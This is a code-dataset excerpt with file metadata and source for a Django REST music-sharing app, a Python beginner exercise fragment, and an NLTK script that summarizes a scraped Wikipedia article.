"UTF-8", "text": "def simple():\n\tprint 5\n\treturn 10\n\t\nsimple()\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.6730769276618958, "alphanum_fraction": 0.692307710647583, "avg_line_length": 25.25, "blob_id": "bdcdb9efdb20ab1b80b3b28d26d748a6de3825ac", "content_id": "fe7b10cd561c4539f700f3079d5b9dd5edb05df0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 104, "license_type": "no_license", "max_line_length": 34, "num_lines": 4, "path": "/basicfunctionpractice.py", "repo_name": "surakhchin/Learn-Python-the-Hard-Way", "src_encoding": "UTF-8", "text": "def print_function_one_argument():\n\tprint \"You whatsup I'm %r\" % (1)\nx = 2\nprint_function_one_argument()" } ]
15
osorkon5513/turing201620
https://github.com/osorkon5513/turing201620
75d2eed3ead317d498bd8dd664f47db8ab20ebd3
0c864e054cc54c2e59f08db6c3abf1b0726efe7e
314c4b517662127d690839b1df09bd77532f617e
refs/heads/master
2020-08-03T22:40:50.057566
2016-10-22T20:03:28
2016-10-22T20:03:28
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.558728814125061, "alphanum_fraction": 0.5664591193199158, "avg_line_length": 43.35238265991211, "blob_id": "e33967d2ad59aab3aa274bed3852801e2a7624e3", "content_id": "ba9807fe3c89feca6e17b4657b436855c6697e4e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4657, "license_type": "no_license", "max_line_length": 144, "num_lines": 105, "path": "/sonidosLibresApp/migrations/0001_initial.py", "repo_name": "osorkon5513/turing201620", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.9 on 2016-10-08 22:01\nfrom __future__ import unicode_literals\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\nimport django.utils.timezone\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Album',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('title', models.CharField(max_length=100)),\n ('rating', models.FloatField(default=0, editable=False)),\n ('numOfRatings', models.IntegerField(default=0, editable=False)),\n ],\n ),\n migrations.CreateModel(\n name='Artist',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=40)),\n ('image', models.URLField()),\n ('user', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'verbose_name_plural': 'artists',\n },\n ),\n migrations.CreateModel(\n name='Audio',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=40)),\n ('title', models.CharField(max_length=40)),\n ('audioDownload', models.URLField()),\n ('audioPlay', models.URLField()),\n ('playCount', models.IntegerField(default=0, editable=False)),\n ('downloadsCount', models.IntegerField(default=0, editable=False)),\n ('rating', models.FloatField(default=0, editable=False)),\n ('numOfRatings', models.IntegerField(default=0, editable=False)),\n ('uploadDate', models.DateTimeField(default=django.utils.timezone.now, editable=False)),\n ('albums', models.ManyToManyField(related_name='audios', to='sonidosLibresApp.Album')),\n ('artists', models.ManyToManyField(related_name='audios', to='sonidosLibresApp.Artist')),\n ],\n ),\n migrations.CreateModel(\n name='Category',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=40)),\n ('image', models.URLField()),\n ],\n options={\n 'verbose_name_plural': 'categories',\n },\n ),\n migrations.CreateModel(\n name='Commentary',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('commentary', models.TextField()),\n ('date', models.DateTimeField(default=django.utils.timezone.now, editable=False)),\n ('audio', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sonidosLibresApp.Audio')),\n ('user', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'verbose_name_plural': 'commentaries',\n },\n ),\n migrations.CreateModel(\n name='UserProfile',\n fields=[\n 
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=100)),\n ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.AddField(\n model_name='audio',\n name='categories',\n field=models.ManyToManyField(related_name='audios', to='sonidosLibresApp.Category'),\n ),\n migrations.AddField(\n model_name='album',\n name='artists',\n field=models.ManyToManyField(related_name='albums', to='sonidosLibresApp.Artist'),\n ),\n migrations.AddField(\n model_name='album',\n name='categories',\n field=models.ManyToManyField(related_name='albums', to='sonidosLibresApp.Category'),\n ),\n ]\n" }, { "alpha_fraction": 0.5674740672111511, "alphanum_fraction": 0.6262975931167603, "avg_line_length": 26.5238094329834, "blob_id": "b8d377b4165ac721fa26c9f3b1f7f1272d8d89c2", "content_id": "2d122a70cba33e1fc104e2e06353c31ee3e5db0b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 578, "license_type": "no_license", "max_line_length": 137, "num_lines": 21, "path": "/sonidosLibresApp/migrations/0003_album_image.py", "repo_name": "osorkon5513/turing201620", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.9 on 2016-10-12 13:03\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('sonidosLibresApp', '0002_auto_20161008_2224'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='album',\n name='image',\n field=models.URLField(default='https://github.com/slinan/sonidosLibresG2/blob/master/docs/assets/img/albums/1.jpg?raw=true'),\n preserve_default=False,\n ),\n ]\n" }, { "alpha_fraction": 0.7081934213638306, "alphanum_fraction": 0.7152451276779175, "avg_line_length": 35.77777862548828, "blob_id": "5d64a566ee3f49e1608463dc7ae7baff4bf3f46c", "content_id": "3625544ddf1c5369cc7689b24a7d21655cae08bc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2978, "license_type": "no_license", "max_line_length": 90, "num_lines": 81, "path": "/sonidosLibresApp/models.py", "repo_name": "osorkon5513/turing201620", "src_encoding": "UTF-8", "text": "from datetime import datetime\n\nimport django\nfrom django.db import models\nfrom django.contrib.auth.models import User\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom django.utils import timezone\n\nclass Category(models.Model):\n def __str__(self):\n return self.name\n class Meta:\n verbose_name_plural = \"categories\"\n\n name = models.CharField(max_length=40)\n image = models.URLField()\n description = models.TextField()\n relatedCategories = models.ManyToManyField('self')\n\n\nclass Artist(models.Model):\n def __str__(self):\n return self.name\n class Meta:\n verbose_name_plural = \"artists\"\n\n name = models.CharField(max_length=40)\n user = models.OneToOneField(User, null=True, blank=True)\n image = models.URLField()\n\n@receiver(post_save, sender=User)\ndef create_user_profile(sender, instance, created, **kwargs):\n if created:\n Artist.objects.create(user=instance)\n\n@receiver(post_save, sender=User)\ndef save_user_profile(sender, instance, **kwargs):\n instance.artist.save()\n\nclass Album (models.Model):\n def __str__(self):\n return self.title\n title = models.CharField(max_length=100)\n rating = models.FloatField(editable=False, 
default = 0)\n numOfRatings = models.IntegerField(editable=False, default = 0)\n categories = models.ManyToManyField(Category,related_name=\"albums\", blank=True)\n artists = models.ManyToManyField(Artist, related_name=\"albums\", blank=True)\n image = models.URLField()\n\nclass Audio(models.Model):\n def __str__(self):\n return self.title + \" \"+str(self.id)\n name = models.CharField(max_length=40)\n title = models.CharField(max_length=40)\n audioDownload = models.URLField()\n audioPlay = models.URLField()\n playCount = models.IntegerField(editable=False, default = 0)\n downloadsCount = models.IntegerField(editable=False, default = 0)\n rating = models.FloatField(editable=False, default = 0)\n numOfRatings = models.IntegerField(editable=False, default = 0)\n categories = models.ManyToManyField(Category,related_name=\"audios\")\n uploadDate = models.DateTimeField(editable=False, default = django.utils.timezone.now)\n albums = models.ManyToManyField(Album, related_name=\"audios\")\n artists = models.ManyToManyField(Artist, related_name=\"audios\")\n\nclass Commentary (models.Model):\n def __str__(self):\n return self.commentary\n class Meta:\n verbose_name_plural = \"commentaries\"\n commentary = models.TextField()\n date = models.DateTimeField(editable=False, default = django.utils.timezone.now)\n audio = models.ForeignKey(Audio,on_delete=models.CASCADE)\n user = models.OneToOneField(User, null=True, blank=True)\n\n # python manage.py makemigrations sonidosLibresApp\n # python manage.py sqlmigrate sonidosLibresApp 0001\n # python manage.py migrate\n # python manage.py createsuperuser\n # $ heroku run python manage.py migrate --app sonidoslibres" }, { "alpha_fraction": 0.5873655676841736, "alphanum_fraction": 0.6142473220825195, "avg_line_length": 28.760000228881836, "blob_id": "066644365f0f6288b560f39bccd1dcaef19b8a32", "content_id": "f49637d461bbbd0ee4092b58af8f624d75267d2b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 744, "license_type": "no_license", "max_line_length": 119, "num_lines": 25, "path": "/sonidosLibresApp/migrations/0004_auto_20161012_1128.py", "repo_name": "osorkon5513/turing201620", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.9 on 2016-10-12 16:28\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('sonidosLibresApp', '0003_album_image'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='album',\n name='artists',\n field=models.ManyToManyField(blank=True, null=True, related_name='albums', to='sonidosLibresApp.Artist'),\n ),\n migrations.AlterField(\n model_name='album',\n name='categories',\n field=models.ManyToManyField(blank=True, null=True, related_name='albums', to='sonidosLibresApp.Category'),\n ),\n ]\n" }, { "alpha_fraction": 0.875, "alphanum_fraction": 0.875, "avg_line_length": 20.66666603088379, "blob_id": "70f4150cb42eb39a4bea83126ffbf3222c7f11c4", "content_id": "477890f76eb9dcbfd984d72e85aa08c29778138a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 64, "license_type": "no_license", "max_line_length": 41, "num_lines": 3, "path": "/sonidosLibresApp/customFilters.py", "repo_name": "osorkon5513/turing201620", "src_encoding": "UTF-8", "text": "import django_filters\n\nfrom sonidosLibresApp.models import Audio" }, { "alpha_fraction": 0.6116071343421936, "alphanum_fraction": 0.6294642686843872, 
"avg_line_length": 49.58064651489258, "blob_id": "4655148fcf721d9af7e246f6a4491d622bda96a4", "content_id": "b4f4cf51bfb9332a85f8a5b3371a2ba7c41e9a49", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1568, "license_type": "no_license", "max_line_length": 106, "num_lines": 31, "path": "/sonidosLibresApp/urls.py", "repo_name": "osorkon5513/turing201620", "src_encoding": "UTF-8", "text": "from django.conf.urls import url, include\nfrom rest_framework.routers import DefaultRouter\nfrom sonidosLibresApp import views\n\nrouter = DefaultRouter()\n\nurlpatterns = [\n url(r'^', include(router.urls)),\n url(r'^login/?$', views.CustomObtainAuthToken.as_view()),\n url(r'^signUp/?$', views.CreateUserView.as_view()),\n url(r'^audios/?$', views.AudioList.as_view()),\n url(r'^audios/(?P<pk>[0-9]+)/?$', views.AudioDetail.as_view()),\n url(r'^artists/?$', views.ArtistList.as_view()),\n url(r'^artists/(?P<pk>[0-9]+)/?$', views.ArtistDetail.as_view()),\n url(r'^categories/?$', views.CategoryList.as_view()),\n url(r'^categories/(?P<pk>[0-9]+)/?$', views.CategoryDetail.as_view()),\n url(r'^albums/?$', views.AlbumList.as_view()),\n url(r'^albums/(?P<pk>[0-9]+)/?$', views.AlbumDetail.as_view()),\n url(r'^commentaries/?$', views.CommentaryList.as_view()),\n url(r'^commentaries/(?P<pk>[0-9]+)/?$', views.CommentaryDetail.as_view()),\n url(r'^albumAudio/(?P<idAudio>[0-9]+)/(?P<idAlbum>[0-9]+)/?$', views.AudioAlbumAssociation.as_view()),\n url(r'^rateAudio/(?P<idAudio>[0-9]+)/(?P<rating>[0-5])/?$', views.RateAudio.as_view()),\n url(r'^rateAlbum/(?P<idAlbum>[0-9]+)/(?P<rating>[0-5])/?$', views.RateAlbum.as_view()),\n url(r'^play/(?P<idAudio>[0-9]+)/?$', views.PlayAudio.as_view()),\n url(r'^download/(?P<idAudio>[0-9]+)/?$', views.DownloadAudio.as_view()),\n url(r'^categoriesTopRating/(?P<size>[0-9]+)/?$', views.CategoriesTopRating.as_view()),\n\n]\n\n#urlpatterns =format_suffix_patterns(urlpatterns)\nurlpatterns += router.urls\n" }, { "alpha_fraction": 0.7943925261497498, "alphanum_fraction": 0.7943925261497498, "avg_line_length": 20.399999618530273, "blob_id": "796dbd67b2f070b70414ec37155882fd5c764872", "content_id": "15b316de3548b0db7b474de63e69e3ebb54936be", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 107, "license_type": "no_license", "max_line_length": 40, "num_lines": 5, "path": "/sonidosLibresApp/apps.py", "repo_name": "osorkon5513/turing201620", "src_encoding": "UTF-8", "text": "from django.apps import AppConfig\n\n\nclass SonidosLibresAppConfig(AppConfig):\n name = 'sonidosLibresApp'\n" }, { "alpha_fraction": 0.6679738759994507, "alphanum_fraction": 0.6679738759994507, "avg_line_length": 27.351852416992188, "blob_id": "856284a6f87cceafb0b1050cedac2d435ab3c478", "content_id": "020b710854935a87c2a00485e54e9582224dd819", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1530, "license_type": "no_license", "max_line_length": 132, "num_lines": 54, "path": "/sonidosLibresApp/serializers.py", "repo_name": "osorkon5513/turing201620", "src_encoding": "UTF-8", "text": "from django.contrib.auth.models import User\nfrom rest_framework import serializers\n\nfrom .models import Audio, Category, Album, Commentary, Artist\n\nclass AudioCreate(serializers.ModelSerializer):\n class Meta:\n model = Audio\n\nclass AudioSerializer(serializers.ModelSerializer):\n class Meta:\n model = Audio\n\nclass AlbumSerializer(serializers.ModelSerializer):\n class Meta:\n 
model = Album\n\nclass ArtistSerializer(serializers.ModelSerializer):\n class Meta:\n model=Artist\n\nclass CategorySerializer(serializers.ModelSerializer):\n class Meta:\n model=Category\n\nclass CategoryWithAudiosSerializer(serializers.ModelSerializer):\n class Meta:\n model=Category\n fields = ['id','name', 'image','audios']\n\n\nclass CommentarySerializer(serializers.ModelSerializer):\n class Meta:\n model=Commentary\n\n\nclass UserSerializer(serializers.ModelSerializer):\n class Meta:\n model = User\n fields = ('id', 'username', 'password', 'email', 'first_name', 'last_name','is_superuser', 'is_staff','is_active', 'groups')\n write_only_fields = ('password',)\n read_only_fields = ('id',)\n\n def create(self, validated_data):\n user = User.objects.create(\n username=validated_data['username'],\n email=validated_data['email'],\n first_name=validated_data['first_name'],\n last_name=validated_data['last_name']\n )\n user.set_password(validated_data['password'])\n user.save()\n\n return user" }, { "alpha_fraction": 0.6712474822998047, "alphanum_fraction": 0.6720216870307922, "avg_line_length": 37.132843017578125, "blob_id": "1f7e47e7f07e26dca91b992ba9d94beb45314d80", "content_id": "4e88b9eeffeaeaf4d097edf795b8d4a2956d5ff4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10333, "license_type": "no_license", "max_line_length": 126, "num_lines": 271, "path": "/sonidosLibresApp/views.py", "repo_name": "osorkon5513/turing201620", "src_encoding": "UTF-8", "text": "from tokenize import Token\n\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.models import User\nfrom django.http import JsonResponse\nfrom rest_framework import permissions\nfrom rest_framework.authentication import BasicAuthentication, TokenAuthentication\nfrom rest_framework.authentication import SessionAuthentication\nfrom rest_framework.authtoken.models import Token\n\nfrom django.shortcuts import render\nfrom rest_framework import generics\nfrom rest_framework import mixins\nfrom rest_framework.authtoken.views import ObtainAuthToken\nfrom rest_framework.generics import CreateAPIView\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.views import APIView\nfrom rest_framework import filters\nfrom sonidosLibresApp.customPagination import StandardResultsSetPagination\nfrom sonidosLibresApp.serializers import AudioSerializer, CategorySerializer, AlbumSerializer, CommentarySerializer, \\\n ArtistSerializer, UserSerializer\nfrom .models import Audio, Category, Album, Commentary, Artist\nfrom rest_framework.response import Response\n\ndef index(request):\n return render(request, 'index.html')\n\nclass CustomObtainAuthToken(ObtainAuthToken):\n def post(self, request, *args, **kwargs):\n response = super(CustomObtainAuthToken, self).post(request, *args, **kwargs)\n token = Token.objects.get(key=response.data['token'])\n user = User.objects.get(id = token.user_id)\n serializer = UserSerializer(user)\n return Response({'token': token.key, 'id': token.user_id, 'user': serializer.data})\n\nclass CreateUserView(CreateAPIView):\n\n model = get_user_model()\n permission_classes = [\n permissions.AllowAny # Or anon users can't register\n ]\n serializer_class = UserSerializer\n\nclass AudioList(mixins.ListModelMixin, mixins.CreateModelMixin, generics.GenericAPIView):\n\n queryset = Audio.objects.all()\n serializer_class = AudioSerializer\n filter_backends = (filters.DjangoFilterBackend,filters.OrderingFilter,)\n pagination_class = 
StandardResultsSetPagination\n filter_fields = ('title', 'rating', 'playCount', 'downloadsCount','uploadDate','numOfRatings', 'categories','albums')\n ordering_fields = ('title', 'rating', 'playCount', 'downloadsCount','uploadDate','numOfRatings')\n\n def get(self, request, *args, **kwargs):\n return self.list(request, *args, **kwargs)\n\n def post(self, request, *args, **kwargs):\n return self.create(request, *args, **kwargs)\n\nclass AudioDetail(mixins.RetrieveModelMixin, mixins.UpdateModelMixin, mixins.DestroyModelMixin, generics.GenericAPIView):\n\n queryset = Audio.objects.all()\n serializer_class = AudioSerializer\n\n def get(self, request, *args, **kwargs):\n return self.retrieve(request, *args, **kwargs)\n\n def put(self, request, *args, **kwargs):\n return self.update(request, *args, **kwargs)\n\n def delete(self, request, *args, **kwargs):\n return self.destroy(request, *args, **kwargs)\n\nclass ArtistList(mixins.ListModelMixin, mixins.CreateModelMixin, generics.GenericAPIView):\n queryset = Artist.objects.all()\n serializer_class = ArtistSerializer\n pagination_class = StandardResultsSetPagination\n\n\n def get(self, request, *args, **kwargs):\n return self.list(request, *args, **kwargs)\n\n def post(self, request, *args, **kwargs):\n return self.create(request, *args, **kwargs)\n\nclass ArtistDetail(mixins.RetrieveModelMixin, mixins.UpdateModelMixin, mixins.DestroyModelMixin, generics.GenericAPIView):\n queryset = Artist.objects.all()\n serializer_class = ArtistSerializer\n\n def get(self, request, *args, **kwargs):\n return self.retrieve(request, *args, **kwargs)\n\n def put(self, request, *args, **kwargs):\n return self.update(request, *args, **kwargs)\n\n def delete(self, request, *args, **kwargs):\n return self.destroy(request, *args, **kwargs)\n\nclass CategoryList(mixins.ListModelMixin, mixins.CreateModelMixin, generics.GenericAPIView):\n queryset = Category.objects.all()\n serializer_class = CategorySerializer\n pagination_class = StandardResultsSetPagination\n\n\n def get(self, request, *args, **kwargs):\n return self.list(request, *args, **kwargs)\n\n def post(self, request, *args, **kwargs):\n return self.create(request, *args, **kwargs)\n\nclass CategoryDetail(mixins.RetrieveModelMixin, mixins.UpdateModelMixin, mixins.DestroyModelMixin, generics.GenericAPIView):\n queryset = Category.objects.all()\n serializer_class = CategorySerializer\n\n def get(self, request, *args, **kwargs):\n return self.retrieve(request, *args, **kwargs)\n\n def put(self, request, *args, **kwargs):\n return self.update(request, *args, **kwargs)\n\n def delete(self, request, *args, **kwargs):\n return self.destroy(request, *args, **kwargs)\n\nclass AlbumList(mixins.ListModelMixin, mixins.CreateModelMixin, generics.GenericAPIView):\n queryset = Album.objects.all()\n serializer_class = AlbumSerializer\n filter_backends = (filters.DjangoFilterBackend,filters.OrderingFilter,)\n pagination_class = StandardResultsSetPagination\n filter_fields = ('title', 'rating', 'categories','numOfRatings','artists','id')\n ordering_fields = ('title', 'rating', 'categories','numOfRatings','artists','id')\n\n def get(self, request, *args, **kwargs):\n return self.list(request, *args, **kwargs)\n\n def post(self, request, *args, **kwargs):\n return self.create(request, *args, **kwargs)\n\nclass AlbumDetail(mixins.RetrieveModelMixin, mixins.UpdateModelMixin, mixins.DestroyModelMixin, generics.GenericAPIView):\n queryset = Album.objects.all()\n serializer_class = AlbumSerializer\n\n def get(self, request, *args, 
**kwargs):\n return self.retrieve(request, *args, **kwargs)\n\n def put(self, request, *args, **kwargs):\n return self.update(request, *args, **kwargs)\n\n def delete(self, request, *args, **kwargs):\n return self.destroy(request, *args, **kwargs)\n\n\nclass CommentaryList(mixins.ListModelMixin, mixins.CreateModelMixin, generics.GenericAPIView):\n queryset = Commentary.objects.all()\n serializer_class = CommentarySerializer\n\n def get(self, request, *args, **kwargs):\n return self.list(request, *args, **kwargs)\n\n def post(self, request, *args, **kwargs):\n return self.create(request, *args, **kwargs)\n\n\nclass CommentaryDetail(mixins.RetrieveModelMixin, mixins.UpdateModelMixin, mixins.DestroyModelMixin, generics.GenericAPIView):\n queryset = Commentary.objects.all()\n serializer_class = CommentarySerializer\n pagination_class = StandardResultsSetPagination\n\n\n def get(self, request, *args, **kwargs):\n return self.retrieve(request, *args, **kwargs)\n\n def put(self, request, *args, **kwargs):\n return self.update(request, *args, **kwargs)\n\n def delete(self, request, *args, **kwargs):\n return self.destroy(request, *args, **kwargs)\n\nclass AudioAlbumAssociation(APIView):\n def get(self,request,idAudio, idAlbum,format=None):\n audio = Audio.objects.get(id=idAudio)\n album = Album.objects.get(id=idAlbum)\n album.audios.add(audio)\n serializer = AudioSerializer(audio)\n return Response(serializer.data)\n\n def delete(self, request, idAudio, idAlbum, format=None):\n audio = Audio.objects.get(id=idAudio)\n album = Album.objects.get(id=idAlbum)\n album.audios.remove(audio)\n serializer = AudioSerializer(audio)\n return Response(serializer.data)\n\nclass RateAudio(APIView):\n def get(self,request,idAudio, rating,format=None):\n audio = Audio.objects.get(id=idAudio)\n newRate = ((audio.rating * audio.numOfRatings) + int(rating))/(audio.numOfRatings + 1)\n audio.rating=newRate\n audio.numOfRatings += 1\n audio.save()\n serializer = AudioSerializer(audio)\n return Response(serializer.data)\n\nclass RateAlbum(APIView):\n def get(self,request,idAlbum, rating,format=None):\n album = Album.objects.get(id=idAlbum)\n newRate = ((album.rating * album.numOfRatings) + int(rating))/(album.numOfRatings + 1)\n album.rating=newRate\n album.numOfRatings += 1\n album.save()\n serializer = AlbumSerializer(album)\n return Response(serializer.data)\n\nclass PlayAudio(APIView):\n def get(self,request,idAudio,format=None):\n audio = Audio.objects.get(id=idAudio)\n audio.playCount += 1\n audio.save()\n serializer = AudioSerializer(audio)\n return Response(serializer.data)\n\nclass DownloadAudio(APIView):\n def get(self,request,idAudio,format=None):\n audio = Audio.objects.get(id=idAudio)\n audio.downloadsCount += 1\n audio.save()\n serializer = AudioSerializer(audio)\n return Response(serializer.data)\n\nclass CategoriesTopRating(APIView):\n def get(self,request,size,format=None):\n resp = []\n categories = Category.objects.all()\n for c in categories:\n cat = {}\n serializer = CategorySerializer(c)\n cat['id']=c.pk\n cat['name']=c.name\n cat['image'] = c.image\n audios = Audio.objects.filter(categories__in=[c.pk]).order_by('-rating')\n audList = []\n var = 0\n for a in audios:\n aud = {}\n aud['id'] = a.pk\n aud['name'] = a.name\n aud['title'] = a.title\n aud['audioDownload'] = a.audioDownload\n aud['audioPlay'] = a.audioPlay\n aud['playCount'] = a.playCount\n aud['downloadsCount'] = a.downloadsCount\n aud['rating'] = a.rating\n aud['uploadDate'] = a.uploadDate\n\n artists = 
Artist.objects.filter(audios__in=[a.pk]).order_by('name')\n artList = []\n for t in artists:\n art = {}\n art['id'] = t.pk\n art['name'] = t.name\n art['image'] = t.image\n artList.append(art)\n\n aud['artists'] = artList\n\n audList.append(aud)\n if var == int(size)-1:\n break\n\n cat['audios']=audList\n resp.append(cat)\n\n return JsonResponse(resp, safe=False)" }, { "alpha_fraction": 0.817427396774292, "alphanum_fraction": 0.817427396774292, "avg_line_length": 25.88888931274414, "blob_id": "faf6796bbdfc87eb2ac3102826006e852d73fb81", "content_id": "091da42f2cb54ee07311e10b96904f86b972380f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 241, "license_type": "no_license", "max_line_length": 62, "num_lines": 9, "path": "/sonidosLibresApp/admin.py", "repo_name": "osorkon5513/turing201620", "src_encoding": "UTF-8", "text": "from django.contrib import admin\n\nfrom .models import Category, Audio, Commentary, Album, Artist\n\nadmin.site.register(Category)\nadmin.site.register(Audio)\nadmin.site.register(Commentary)\nadmin.site.register(Album)\nadmin.site.register(Artist)" }, { "alpha_fraction": 0.5842245817184448, "alphanum_fraction": 0.6109625697135925, "avg_line_length": 27.769229888916016, "blob_id": "957b87bdbd33c7f5ec30608b430b3c9b00c0aa2e", "content_id": "a56c1cd5ab9d30cb913976599b1c5337437399b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 748, "license_type": "no_license", "max_line_length": 119, "num_lines": 26, "path": "/sonidosLibresApp/migrations/0002_auto_20161008_2224.py", "repo_name": "osorkon5513/turing201620", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.9 on 2016-10-09 03:24\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('sonidosLibresApp', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='category',\n name='description',\n field=models.TextField(default='This is a generic description'),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='category',\n name='relatedCategories',\n field=models.ManyToManyField(related_name='_category_relatedCategories_+', to='sonidosLibresApp.Category'),\n ),\n ]\n" } ]
11
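The `RateAudio` and `RateAlbum` views in the `views.py` listing above fold a new vote into a stored running average instead of keeping individual ratings. Below is a minimal sketch of that update rule outside Django, assuming a plain dict in place of the model; the function name `add_rating` and the dict itself are illustrative assumptions, not part of the repository.

```python
def add_rating(item, new_rating):
    # Fold one vote into the running average, mirroring the editable=False
    # 'rating' and 'numOfRatings' fields on the Audio and Album models above.
    total = item['rating'] * item['numOfRatings'] + new_rating
    item['numOfRatings'] += 1
    item['rating'] = total / item['numOfRatings']
    return item

# Three votes of 4, 5 and 3 average out to 4.0
audio = {'rating': 0.0, 'numOfRatings': 0}
for vote in (4, 5, 3):
    add_rating(audio, vote)
print(audio['rating'])  # 4.0
```

Keeping only the current average and the vote count means each rating request can update the object in place and save it immediately, which is the design the two views rely on.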
patilpooja99/cricpy
https://github.com/patilpooja99/cricpy
7324beac27ef49696e5d23894c7de30b8918d5a9
c4bd96989abab7bb67b88ee1b0f045af8143ac95
57c463c8c1c0822281a1f3b27a829b297749ffad
refs/heads/master
2020-12-15T08:30:59.624088
2020-01-20T08:26:16
2020-01-20T08:26:16
235,047,237
2
0
null
null
null
null
null
[ { "alpha_fraction": 0.718120813369751, "alphanum_fraction": 0.7217002511024475, "avg_line_length": 34.4603157043457, "blob_id": "06fe5e56b3d22933cf8ca85fa1adc688aa12f7de", "content_id": "878ac36de87310f4bafb9ba0faeebf26f8c85a73", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2235, "license_type": "no_license", "max_line_length": 93, "num_lines": 63, "path": "/summarizer.py", "repo_name": "patilpooja99/cricpy", "src_encoding": "UTF-8", "text": "from urllib import request\nfrom bs4 import BeautifulSoup as bs\nimport re\nimport nltk\nimport heapq\n\n\n\n\nurl = \"https://en.wikipedia.org/wiki/Artificial_Intelligence\"\nallParagraphContent = \"\"\nhtmlDoc = request.urlopen(url)\nsoupObject = bs(htmlDoc,'html.parser')\nparagraphContents = soupObject.findAll('p')\n#print(paragraphContents)\n\nfor paragraphContent in paragraphContents:\n allParagraphContent += paragraphContent.text\n #print(paragraphContent)\n\nallParagraphContent_cleanerData = re.sub(r'\\[[0-9]*\\]',' ', allParagraphContent)\nallParagraphContent_cleanedData = re.sub(r'\\s+',' ', allParagraphContent_cleanerData)\n\n#print(allParagraphContent_cleanedData)\n\n#allParagraphContent_cleanedData = re.sub(r'[^a-zA-Z]',' ', allParagraphContent_cleanedData)\n#allParagraphContent_cleanedData = re.sub(r'\\s+',' ', allParagraphContent_cleanedData)\n\n##### creating Sentence Tokens\nsentences_tokens = nltk.sent_tokenize(allParagraphContent_cleanedData)\nwords_tokens =nltk.word_tokenize(allParagraphContent_cleanedData)\n\n##### calculate the frequency\nstopwords= nltk.corpus.stopwords.words('english')\nword_frequencies = {}\n\nfor word in words_tokens:\n if word not in stopwords:\n if word not in word_frequencies.keys():\n word_frequencies[word] = 1\n else:\n word_frequencies[word] += 1\n#print(word_frequencies)\n##### calculate weighted frequency\nmaximum_frequency_word = max(word_frequencies.values())\nfor word in word_frequencies.keys():\n word_frequencies[word] = (word_frequencies[word]/maximum_frequency_word)\n#print(word_frequencies)\n\n#####calculate sentence score with each word weighted frequency\nsentences_scores = {}\nfor sentence in sentences_tokens:\n for word in nltk.word_tokenize(sentence.lower()):\n if word in word_frequencies.keys():\n if len(sentence.split(' ')) < 30:\n if sentence not in sentences_scores.keys():\n sentences_scores[sentence] = word_frequencies[word]\n else:\n sentences_scores[sentence] += word_frequencies[word]\n#print(sentences_scores)\n \nsummary_artificialIntelligence = heapq.nlargest(5,sentences_scores, key=sentences_scores.get)\nprint(summary_artificialIntelligence)\n\n" } ]
1
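The `summarizer.py` file in the record above scores each sentence by the summed, max-normalized frequencies of its non-stopword tokens and keeps the top sentences with `heapq.nlargest`. Below is a self-contained sketch of that scoring step on plain strings, assuming a tiny hard-coded stopword set and made-up sample sentences; the original pulls its text from Wikipedia and uses NLTK's tokenizers and stopword corpus.

```python
import heapq
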